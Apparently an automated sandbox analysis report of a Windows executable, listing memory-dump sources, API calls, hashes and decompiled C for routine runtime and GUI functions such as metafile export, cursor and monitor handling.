Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 4d0d99356437b71de63a44d3386551287ede8089ba210b71d2e0fc9be5e30c92
Instruction ID: 3c4913b094686cf0c2ff5e4cf0cf33b0d09393fbe7615d330e62532ae101903a
Opcode Fuzzy Hash: 4d0d99356437b71de63a44d3386551287ede8089ba210b71d2e0fc9be5e30c92
Instruction Fuzzy Hash: 49416D74A00209AFDB11DF55C981B9EB7F8EB48305F9144EAE904E7392D738EE44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409EAC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409EAC(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x48f714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409EA0(_t73);
					L4:
					E00408BDC( &_v273, 0x104, E0040AC88(0x5c, _t89) + 1);
					_t74 = 0x40a02c;
					_t86 = 0x40a02c;
					_t83 =  *0x407720; // 0x40776c
					if(E00403740(_t87, _t83) != 0) {
						_t74 = E004047D0( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408B78(_t74, 0x40a02c);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x40a030;
						}
					}
					_t51 =  *0x48e828; // 0x4074e0
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x48f714; // 0x400000
					LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
					E00403504( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E00409298(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408B78(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}

0x00409eb8
0x00409ebb
0x00409ebd
0x00409ec9
0x00409ed8
0x00409ef6
0x00409f02
0x00409f08
0x00409f14
0x00409f22
0x00409f3d
0x00409f42
0x00409f47
0x00409f4e
0x00409f5b
0x00409f65
0x00409f69
0x00409f70
0x00409f79
0x00409f79
0x00409f70
0x00409f8a
0x00409f8f
0x00409f93
0x00409f9e
0x00409fab
0x00409fb6
0x00409fbc
0x00409fc9
0x00409fcf
0x00409fd9
0x00409fdf
0x00409fe6
0x00409fec
0x00409ff3
0x00409ff9
0x0040a015
0x0040a028
0x0040a028
0x00409eed
0x00409ef2
0x00409ef4
0x00409f19
0x00409f19
0x00409f1f
0x00000000
0x00409f1f
0x00000000

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409EC9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EED
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F08
LoadStringA.USER32 ref: 00409F9E

Strings

t@, xrefs: 00409F8A
lw@, xrefs: 00409F4E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: lw@$t@
API String ID: 3990497365-1029788205
Opcode ID: a595ac5f2271262c7460aa13557c5e4e922478f33d1bb439d2843ed51e9a283f
Instruction ID: 3c1774db47878605661622ad82335aef62b3931344819077a0ac3d570add622f
Opcode Fuzzy Hash: a595ac5f2271262c7460aa13557c5e4e922478f33d1bb439d2843ed51e9a283f
Instruction Fuzzy Hash: 864121719002589BDB21DF59CC85BDAB7BCAB08344F0040FAA548F7292D778AF948F59

Uniqueness

Uniqueness Score: -1.00%

Function 00409EAA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409EAA(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x48f714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409EA0(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408BDC( &_v273, 0x104, E0040AC88(0x5c, _t101) + 1);
				_t75 = 0x40a02c;
				_t89 = 0x40a02c;
				_t85 =  *0x407720; // 0x40776c
				if(E00403740(_t92, _t85) != 0) {
					_t75 = E004047D0( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408B78(_t75, 0x40a02c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a030;
					}
				}
				_t51 =  *0x48e828; // 0x4074e0
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x48f714; // 0x400000
				LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
				E00403504( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00409298(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408B78(_v8, _t89);
			}

0x00409eb8
0x00409ebb
0x00409ebd
0x00409ec9
0x00409ed8
0x00409ef6
0x00409f02
0x00409f08
0x00409f14
0x00409eda
0x00409eed
0x00409ef2
0x00409ef4
0x00409f19
0x00409f19
0x00409f1f
0x00000000
0x00000000
0x00000000
0x00409ef4
0x00409f3d
0x00409f42
0x00409f47
0x00409f4e
0x00409f5b
0x00409f65
0x00409f69
0x00409f70
0x00409f79
0x00409f79
0x00409f70
0x00409f8a
0x00409f8f
0x00409f93
0x00409f9e
0x00409fab
0x00409fb6
0x00409fbc
0x00409fc9
0x00409fcf
0x00409fd9
0x00409fdf
0x00409fe6
0x00409fec
0x00409ff3
0x00409ff9
0x0040a015
0x0040a028

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409EC9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EED
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F08
LoadStringA.USER32 ref: 00409F9E

Strings

t@, xrefs: 00409F8A
lw@, xrefs: 00409F4E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: lw@$t@
API String ID: 3990497365-1029788205
Opcode ID: 2a004b60225c12480c7459b73294bdc07f2efa1739b3e88cf04f6e4892dd5603
Instruction ID: 01f810e6b90fd811f6012997ed2deb681909e466dfb8905640863207e18db97e
Opcode Fuzzy Hash: 2a004b60225c12480c7459b73294bdc07f2efa1739b3e88cf04f6e4892dd5603
Instruction Fuzzy Hash: 3E413071A002589BDB21DB59CC85BDAB7FC9B08344F0040FAB548F7292D778AF948F59

Uniqueness

Uniqueness Score: -1.00%

Function 004230C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004230C0(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EC8( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00421384( &_v38);
					_v18 = _t43;
					_push(0);
					L00406E30();
					_v16 = _t43;
					_push(_t83);
					_push(0x4231fb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E0040272C(_v12);
					_push(_t83);
					_push(0x4231db);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420594(_t67);
					}
					E004166D8(_t80, 0x16,  &_v38);
					E004166D8(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(E004231E2);
					return E0040274C(_v8);
				}
			}

0x004230c1
0x004230c3
0x004230c8
0x004230ca
0x004230d0
0x00423207
0x004230d6
0x004230e0
0x004230e5
0x004230e8
0x004230ef
0x004230f6
0x00423100
0x004230f8
0x004230f8
0x004230f8
0x00423117
0x0042312e
0x00423135
0x0042313a
0x0042313e
0x00423140
0x00423145
0x0042314a
0x0042314b
0x00423150
0x00423153
0x00423169
0x00423174
0x00423179
0x0042317a
0x0042317f
0x00423182
0x0042319f
0x004231a1
0x004231a1
0x004231b0
0x004231bd
0x004231c4
0x004231c7
0x004231ca
0x004231da
0x004231da

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00423112
MulDiv.KERNEL32(?,?,000009EC), ref: 00423129
72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00423140
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004231FB,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00423164
GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004231DB,?,?,00000000,00000000,00000008,?,00000000,004231FB), ref: 00423197

Strings

`, xrefs: 004230F8

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: d0b049e8ebd3e649995efa6524b31437e11736486cb54f243495e1a693e6386e
Instruction ID: 513da4453e2b76be0c26d28001fe48ad55a34af8564f53d1149453300fdc6d59
Opcode Fuzzy Hash: d0b049e8ebd3e649995efa6524b31437e11736486cb54f243495e1a693e6386e
Instruction Fuzzy Hash: 1F317675B00218ABDB01DFD5D882ABEB7B8EF0D704F514456F904EB281D67C9E50C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00440BC8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00440BC8(void* __eax) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				char _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x48e5b4; // 0x48fa94
					_t17 =  *0x48e5b4; // 0x48fa94
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L004268A8();
					_v8 = _t19;
					_push(_t49);
					_push(0x440c88);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x48e838; // 0x48fc00
					_t23 = E00456D18( *_t21,  *((short*)(__eax + 0x68)));
					_t4 =  &_v8; // 0x436d56
					E004268E0( *_t4, _t23);
					_t26 =  *0x48e838; // 0x48fc00
					_t28 = E00456D18( *_t26,  *((short*)(_t39 + 0x68)));
					_t6 =  &_v8; // 0x436d56
					E004268E0( *_t6, _t28);
					_push(0);
					_push(0);
					_push(0);
					_t7 =  &_v8; // 0x436d56
					_push( *_t7);
					L00426934();
					_push( &_v16);
					_push(0);
					L00426944();
					_push(_v12);
					_push(_v16);
					_push(1);
					_t11 =  &_v8; // 0x436d56
					_push( *_t11);
					L00426934();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x440c8f);
					_t12 =  &_v8; // 0x436d56
					_t37 =  *_t12;
					_push(_t37);
					L004268B0();
					return _t37;
				}
			}

0x00440bc9
0x00440bcb
0x00440bcf
0x00440bd6
0x00440c93
0x00440bdc
0x00440be4
0x00440bf0
0x00440bf7
0x00440bf9
0x00440bfa
0x00440bff
0x00440c04
0x00440c05
0x00440c0a
0x00440c0d
0x00440c14
0x00440c1b
0x00440c22
0x00440c25
0x00440c2e
0x00440c35
0x00440c3c
0x00440c3f
0x00440c44
0x00440c46
0x00440c48
0x00440c4a
0x00440c4d
0x00440c4e
0x00440c56
0x00440c57
0x00440c59
0x00440c61
0x00440c65
0x00440c66
0x00440c68
0x00440c6b
0x00440c6c
0x00440c73
0x00440c76
0x00440c79
0x00440c7e
0x00440c7e
0x00440c81
0x00440c82
0x00440c87
0x00440c87

APIs

73451AB0.COMCTL32(00000000), ref: 00440BFA

Part of subcall function 004268E0: 73452140.COMCTL32(VmC,000000FF,00000000,00440C2A,00000000,00440C88,?,00000000), ref: 004268E4

73451680.COMCTL32(VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C4E
73451710.COMCTL32(00000000,?,VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C59
73451680.COMCTL32(VmC,00000001,?,00440CF1,00000000,?,VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C6C
73451F60.COMCTL32(VmC,00440C8F,00440CF1,00000000,?,VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C82

Strings

VmC, xrefs: 00440C22, 00440C3C, 00440C4A, 00440C68, 00440C7E, 00440C4D, 00440C6B, 00440C81

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7345173451680$7345171073452140
String ID: VmC
API String ID: 821207058-2834730704
Opcode ID: eb8903c91f2bf74edd23b699f653a96b3fe11d835ff7514aa1398303b9329f4e
Instruction ID: 9953ed128cad8feb0f3ae23d12cf6c5aaa35a128a7d55d8bda8166df7b972544
Opcode Fuzzy Hash: eb8903c91f2bf74edd23b699f653a96b3fe11d835ff7514aa1398303b9329f4e
Instruction Fuzzy Hash: E1216075B40204EFEB10EBA9DC82F6D73F8EB49B04F5104A5F900DB291DA75AD50DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00426DA8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00426DA8(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x48fac1 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A30();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x48faa8; // 0x426da8
					 *0x48faa8 = E004269A4(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x48faa8(_t27, _t29);
				}
				return _t24;
			}

0x00426db1
0x00426db4
0x00426dbe
0x00426de3
0x00426deb
0x00426e0b
0x00426e10
0x00426e1b
0x00426e26
0x00426e30
0x00426e31
0x00426e32
0x00426e33
0x00426e34
0x00426e35
0x00426e3f
0x00426e41
0x00426e49
0x00426e4a
0x00426e4a
0x00426e4f
0x00426e4f
0x00426dc0
0x00426dc5
0x00426dd2
0x00426ddf
0x00426ddf
0x00426e59

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426E00
GetSystemMetrics.USER32 ref: 00426E15
GetSystemMetrics.USER32 ref: 00426E20
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426E4A

Part of subcall function 004269A4: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426A24

Strings

GetMonitorInfoA, xrefs: 00426DC0
DISPLAY, xrefs: 00426E41

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: f900c35ae3dc6205bd407d6816b77bff7fe57f22696ddf71ae9018093f2ad49e
Instruction ID: f8cde7d44004624ee2a9f4519e191afe13ff0c7a16453b1947641015e797f9db
Opcode Fuzzy Hash: f900c35ae3dc6205bd407d6816b77bff7fe57f22696ddf71ae9018093f2ad49e
Instruction Fuzzy Hash: 4011D2357003209FD720CF60EC447ABB7A9EB45B20F52493EED4997640D774A848C799

Uniqueness

Uniqueness Score: -1.00%

Function 00423744, Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00423744(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E00420DD0(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L00406E30();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00406A60();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x4237f3);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x4237fa);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407090();
						return _t31;
					}
				}
			}

0x00423744
0x00423745
0x00423747
0x0042374f
0x00423752
0x00423756
0x004237fa
0x004237ff
0x00423767
0x00423775
0x0042377a
0x0042377e
0x00000000
0x00423780
0x00423780
0x00423782
0x00423787
0x0042378a
0x0042378d
0x0042378e
0x00423793
0x004237a0
0x004237a5
0x004237a6
0x004237ab
0x004237ae
0x004237bf
0x004237c6
0x004237c9
0x004237cc
0x004237d9
0x004237e2
0x004237e7
0x004237ea
0x004237eb
0x004237ed
0x004237f2
0x004237f2
0x0042377e

APIs

Part of subcall function 00420DD0: GetObjectA.GDI32(00000000,00000004), ref: 00420DE7
Part of subcall function 00420DD0: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,00423A4E,00000000,00423BA4,?,00000000), ref: 00420E0A

72E7AC50.USER32(00000000), ref: 00423782
72E7A590.GDI32(?,00000000), ref: 0042378E
SelectObject.GDI32(?), ref: 0042379B
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,004237F3,?,?,?,?,00000000), ref: 004237BF
SelectObject.GDI32(?,?), ref: 004237D9
DeleteDC.GDI32(?), ref: 004237E2
72E7B380.USER32(00000000,?,?,?,?,004237FA,?,00000000,004237F3,?,?,?,?,00000000), ref: 004237ED

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$A590B380ColorDeleteTable
String ID:
API String ID: 980243606-0
Opcode ID: 87f96016a7a646f630481e6696d2d5353e40e77120ca7cdba65db843f4ef4c70
Instruction ID: b287b78f8c2a47c6c3545cd447f796bbb0f573e48773bc7eb7c4b6b30d5c8d90
Opcode Fuzzy Hash: 87f96016a7a646f630481e6696d2d5353e40e77120ca7cdba65db843f4ef4c70
Instruction Fuzzy Hash: AD1187F1E002296BDB00EFE9DC52AAEB3BCEB48304F418476B505E7291D6BC9E504B54

Uniqueness

Uniqueness Score: -1.00%

Function 00456D40, Relevance: 10.6, APIs: 7, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00456D40(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00456D18(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004071F0(SendMessageA(_t27, 0x84, 0, E00407274(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x00456d40
0x00456d40
0x00456d44
0x00456d47
0x00456d49
0x00456d4f
0x00456dc4
0x00456dc4
0x00456d51
0x00456d51
0x00456d58
0x00456db4
0x00456dbf
0x00000000
0x00456d5a
0x00456d5b
0x00456d60
0x00456d6d
0x00456d71
0x00000000
0x00456d73
0x00456d76
0x00456d84
0x00000000
0x00456d86
0x00456dad
0x00456dad
0x00456d84
0x00456d71
0x00456d58
0x00456dcd

APIs

GetCursorPos.USER32 ref: 00456D5B
WindowFromPoint.USER32(?,?), ref: 00456D68
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00456D76
GetCurrentThreadId.KERNEL32 ref: 00456D7D
SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00456D96
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00456DAD
SetCursor.USER32(00000000), ref: 00456DBF

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 306cdf2b890e1182cba67fe1a6e39cdbbecb4d3fba69456f6993d8c24ab47364
Instruction ID: ac3e4da1ce0524eed089a6cf3934fddf4ca9b81ecae305a6cab7641aa384b303
Opcode Fuzzy Hash: 306cdf2b890e1182cba67fe1a6e39cdbbecb4d3fba69456f6993d8c24ab47364
Instruction Fuzzy Hash: 6801D42230520165DA2077368C82F7F2578DF81B59F510A3FBA04BB2C7E93D9C08926E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3D0, Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

